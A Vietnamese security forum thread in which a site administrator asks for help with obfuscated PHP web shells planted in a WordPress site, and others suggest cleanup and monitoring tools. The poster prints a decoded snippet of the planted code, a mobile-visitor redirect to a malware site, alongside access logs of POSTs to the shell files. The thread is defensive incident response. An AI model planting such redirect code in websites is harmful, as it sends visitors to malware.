banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp  XML
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 06/03/2013 08:38:29 (+0700) | #1 | 273881
8BiBi8
Member

[Minus]    0    [Plus]
Joined: 03/07/2012 22:44:21
Messages: 24
Offline
[Profile] [PM]
Sáng nay mình vào cty thì nghe mọi người cty bảo là web vào không được, thử ssh thì thấy CPU server 100%, top 1 phát thì có khoảng 1 chục request cpu 40 - 60% httpd, xem log http thì thấy client đang request vào các đường dẫn file chưa từng tồn tại trong thư mục web, file mình upload lên mediafire:

Code:
http://www.mediafire.com/?7r6hi8e38rxhm8e


1. Toàn bộ đều là file php, nhưng code đã bị mã hoá, mình không rành vụ mã hoá này, mong được các bạn HVA phân tích giúp là "kẻ lạ mặt" đã và đang làm gì?.

2. Hiện tại mình tạm thời tắt quyền write thư mục, file. serve đã ổn, mình có biết chút ít về code php, đọc sơ qua các file thì hình như là "kẻ lạ mặt" đang submit POST lên server mình và get thông tin server, mình không hiểu là vì sao một vài cú POST httpd như vậy mà lại chiếm quá nhiều % CPU như thế, xin được trợ giúp cách khắc phục.

Xin cám ơn.
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 06/03/2013 09:43:42 (+0700) | #2 | 273886
kakarottbatdong
Member

[Minus]    0    [Plus]
Joined: 02/05/2009 19:27:06
Messages: 55
Offline
[Profile] [PM]
Những file bồ đưa là những con shell php. dùng để xem thông tin php.ini và các file trên host của bồ, bồ nên tìm thêm và xoá đi, sau đó cố gắng tìm các lỗi để fix
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 06/03/2013 10:47:55 (+0700) | #3 | 273890
8BiBi8
Member

[Minus]    0    [Plus]
Joined: 03/07/2012 22:44:21
Messages: 24
Offline
[Profile] [PM]

kakarottbatdong wrote:
Những file bồ đưa là những con shell php. dùng để xem thông tin php.ini và các file trên host của bồ, bồ nên tìm thêm và xoá đi, sau đó cố gắng tìm các lỗi để fix 


thanks bạn,

Bạn biết cách nào để giới hạn một process httpd không dùng nhiều % CPU đã định trước không?
Và không biết có chức năng, hoặc phần mềm, hoặc giải pháp nào trên linux giúp mình khoá một thư mục tuỳ chọn, nếu có file mới trong thư mục đó hoặc thư mục con của thư mục đó thì hệ thống sẽ send cho mình một email cảnh báo không?
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 06/03/2013 11:02:26 (+0700) | #4 | 273893
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

8BiBi8 wrote:

Bạn biết cách nào để giới hạn một process httpd không dùng nhiều % CPU đã định trước không?
 

http://cpulimit.sourceforge.net/

8BiBi8 wrote:

Và không biết có chức năng, hoặc phần mềm, hoặc giải pháp nào trên linux giúp mình khoá một thư mục tuỳ chọn, nếu có file mới trong thư mục đó hoặc thư mục con của thư mục đó thì hệ thống sẽ send cho mình một email cảnh báo không? 

http://www.splitbrain.org/blog/2011-01/07-watcher_a_recursive_incron_alternative
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 06/03/2013 11:14:14 (+0700) | #5 | 273894
[Avatar]
tarzanvip
Member

[Minus]    0    [Plus]
Joined: 17/09/2004 16:54:06
Messages: 50
Offline
[Profile] [PM]

8BiBi8 wrote:
[
Và không biết có chức năng, hoặc phần mềm, hoặc giải pháp nào trên linux .... nếu có file mới trong thư mục đó hoặc thư mục con của thư mục đó thì hệ thống sẽ send cho mình một email cảnh báo không? 


Cái này có thể giúp được bạn:
http://iwatch.sourceforge.net/index.html
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 06/03/2013 13:58:55 (+0700) | #6 | 273902
8BiBi8
Member

[Minus]    0    [Plus]
Joined: 03/07/2012 22:44:21
Messages: 24
Offline
[Profile] [PM]
Cám ơn bạn quanta, và tarzanvip
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 07/03/2013 09:38:41 (+0700) | #7 | 273924
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]
Việc giám sát thư mục rồi gửi mail cảnh báo khi có file nào đó bị upload lên chỉ là biện pháp tạm thời thôi. Khi đó thì chuyện đã rồi. Điều quan trọng bạn cần tìm ra là các files này được upload lên bằng đường nào.

8BiBi8 wrote:

1. Toàn bộ đều là file php, nhưng code đã bị mã hoá, mình không rành vụ mã hoá này, mong được các bạn HVA phân tích giúp là "kẻ lạ mặt" đã và đang làm gì?.
 

Bạn thử paste vào đây: http://ddecode.com/phpdecoder/ xem. Sau đó phân tích rồi tìm cách chặn.
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 07/03/2013 11:16:06 (+0700) | #8 | 273932
8BiBi8
Member

[Minus]    0    [Plus]
Joined: 03/07/2012 22:44:21
Messages: 24
Offline
[Profile] [PM]

quanta wrote:
Việc giám sát thư mục rồi gửi mail cảnh báo khi có file nào đó bị upload lên chỉ là biện pháp tạm thời thôi. Khi đó thì chuyện đã rồi. Điều quan trọng bạn cần tìm ra là các files này được upload lên bằng đường nào.

Bạn thử paste vào đây: http://ddecode.com/phpdecoder/ xem. Sau đó phân tích rồi tìm cách chặn. 


Cám ơn bạn quanta đã có lời khuyên.

Decode đoạn đầu mã hoá của file stat6jcp.php:
Code:
if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }


với link http://mobile-mobi.info bị KIS của mình báo là có mailware (mình dùng Chrome với add-on NoScript nên cũng mạo hiểm vào xem mobile-mobi.info là cái gì nhưng KIS đã chặn).

Mình có xem file log, với 1 đoạn được trích lại như sau:

Code:
95.117.81.127 - - [07/Mar/2013:11:19:18 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
109.28.217.142 - - [07/Mar/2013:11:20:34 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.90.37.157 - - [07/Mar/2013:11:20:35 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.79.201.124 - - [07/Mar/2013:11:21:09 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
2.39.20.133 - - [07/Mar/2013:11:21:29 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
188.76.173.75 - - [07/Mar/2013:11:22:43 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
158.181.185.91 - - [07/Mar/2013:11:23:01 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.153.171.206 - - [07/Mar/2013:11:23:07 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.129.188.95 - - [07/Mar/2013:11:23:29 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.250.79.99 - - [07/Mar/2013:11:25:35 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.106.230.161 - - [07/Mar/2013:11:25:56 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.35.90.225 - - [07/Mar/2013:11:26:50 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.191.63.4 - - [07/Mar/2013:11:27:16 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.186.121.125 - - [07/Mar/2013:11:27:24 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.183.121.44 - - [07/Mar/2013:11:27:34 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
95.117.81.127 - - [07/Mar/2013:11:27:59 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.250.79.99 - - [07/Mar/2013:11:28:46 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.172.68.80 - - [07/Mar/2013:11:29:03 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.168.130.93 - - [07/Mar/2013:11:29:16 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.106.230.161 - - [07/Mar/2013:11:29:25 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
99.9.152.6 - - [07/Mar/2013:11:31:11 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.153.171.206 - - [07/Mar/2013:11:31:15 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.202.224.207 - - [07/Mar/2013:11:31:39 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.205.78.141 - - [07/Mar/2013:11:32:26 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.61.157.227 - - [07/Mar/2013:11:32:52 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.183.121.44 - - [07/Mar/2013:11:34:04 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.77.79.174 - - [07/Mar/2013:11:34:46 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
206.214.15.66 - - [07/Mar/2013:11:35:51 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.93.240.44 - - [07/Mar/2013:11:36:27 +0700] "GET /wp-content/themes/las92/info.html HTTP/1.1" 200 2064 "<web người dùng bình thường>" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:27 +0700] "GET /wp-content/themes/las92/info.swf HTTP/1.1" 200 1076366 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
118.69.197.136 - - [07/Mar/2013:11:36:41 +0700] "POST /wp-cron.php?doing_wp_cron=1362631001.1471779346466064453125 HTTP/1.0" 200 - "-" "WordPress/3.4.2; web người dùng bình thường"
180.93.240.44 - - [07/Mar/2013:11:36:40 +0700] "GET /?p=27&lang=en HTTP/1.1" 200 14697 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=2.5.0 HTTP/1.1" 200 175 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/style.css HTTP/1.1" 200 15660 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/flexcrollstyles.css HTTP/1.1" 200 1316 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/flexcroll.js HTTP/1.1" 200 15019 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/mootools-1.2-more.js HTTP/1.1" 200 18934 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"


Có vẻ như các ip cứ truy cập vào file hack đều đều từng giây một và đổi ip liên tục (chắc là muốn vượt firewall), minh nghĩ chắc là ai đó đã hack web của mình bằng các plugin chưa được cập nhật, chỉ có 2 thư mục wp-content/plugins và wp-content/themes trên web có quyền write và cả 2 đều chứa file hack. Nhưng mình vẫn không hiểu là việc cứ 1s request vào "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" để làm gì nữa?

Mình đã mv toàn bộ thư mục web sang chỗ khác và chown nó sang root, xong svn lại toàn bộ web (svn cho lẹ, đỡ phải tìm từng file hack rồi xoá, hic ).

p/s: bạn quanta cho mình hỏi là có cách nào block các request này không theo như logs mình có copy ở trên
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 08/03/2013 15:15:58 (+0700) | #9 | 273951
sallythanhson
Member

[Minus]    0    [Plus]
Joined: 16/01/2013 19:53:13
Messages: 21
Offline
[Profile] [PM]
Mình cũng gặp trường hợp tương tự bạn ở phần access log, xin được post lên để mọi người cũng thảo luận

Code:
0.83.130.250 - - [08/Mar/2013:10:51:15 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
124.150.140.90 - - [08/Mar/2013:10:51:17 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
95.172.4.3 - - [08/Mar/2013:10:51:16 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
178.239.167.212 - - [08/Mar/2013:10:51:16 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
96.30.48.108 - - [08/Mar/2013:10:51:17 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
188.138.100.217 - - [08/Mar/2013:10:51:18 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
82.148.68.2 - - [08/Mar/2013:10:51:11 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
69.39.155.106 - - [08/Mar/2013:10:51:21 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
66.96.128.60 - - [08/Mar/2013:10:51:23 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
89.31.145.75 - - [08/Mar/2013:10:51:25 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
80.83.130.250 - - [08/Mar/2013:10:51:25 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
122.112.3.88 - - [08/Mar/2013:10:51:26 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
124.150.140.90 - - [08/Mar/2013:10:51:26 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
217.16.9.220 - - [08/Mar/2013:10:51:21 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
80.83.130.250 - - [08/Mar/2013:10:51:34 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
96.53.101.50 - - [08/Mar/2013:10:51:34 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
66.96.128.60 - - [08/Mar/2013:10:51:39 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
82.85.114.57 - - [08/Mar/2013:10:50:45 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 - "-" "Mozilla/5.0 Firefox/3.6.12"
221.132.35.45 - - [08/Mar/2013:10:51:44 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
85.249.230.64 - - [08/Mar/2013:10:51:45 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
85.249.230.64 - - [08/Mar/2013:10:51:46 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
210.193.30.212 - - [08/Mar/2013:10:51:43 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
66.96.128.60 - - [08/Mar/2013:10:51:49 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
89.18.179.45 - - [08/Mar/2013:10:51:50 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
27.251.157.23 - - [08/Mar/2013:10:51:45 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"


Vì các request của cùng 1 IP thời gian cách nhau xa nên csf của mình không đưa vào blacklist, mình tạm thời theo dõi và deny IP bằng tay để giải quyết tạm thời. Hi vọng mọi người có giải pháp hay hơn cho trường hợp này.

@8BiBi8 : hiện tại mình sử dụng ClamAV ( http://www.clamav.net/lang/en/ )để scan các vấn đề về shell cho server, bản thử tham khảo xem có giúp ích được gì không nhé.
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 11/03/2013 17:10:47 (+0700) | #10 | 274013
8BiBi8
Member

[Minus]    0    [Plus]
Joined: 03/07/2012 22:44:21
Messages: 24
Offline
[Profile] [PM]
chắc mình phải mở box mới thôi sallythanhson, vượt ra chủ đề rồi
[Up] [Print Copy]
  [Question]   Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp 19/03/2013 07:04:51 (+0700) | #11 | 274182
[Avatar]
TheShinichi
Member

[Minus]    0    [Plus]
Joined: 25/03/2005 01:40:31
Messages: 182
Offline
[Profile] [PM]
Bạn đang dùng WordPress phiên bản mấy ? Đã upgrade lên mới nhất chưa ? Có một phiên bản của WP bị lỗi bảo mật để hacker lợi dụng up shell lên /wp-contents/themes
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|